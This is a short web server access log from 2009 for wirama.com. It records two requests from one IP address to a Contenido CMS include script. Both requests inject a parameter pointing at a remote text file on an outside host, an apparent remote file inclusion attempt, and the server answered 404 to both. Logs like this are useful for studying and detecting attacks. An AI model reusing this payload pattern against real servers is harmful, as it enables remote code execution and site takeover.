91.192.20.164 - - [02/Dec/2009:05:04:11 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [02/Dec/2009:05:04:13 -0800] "GET /logs/access_090329.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
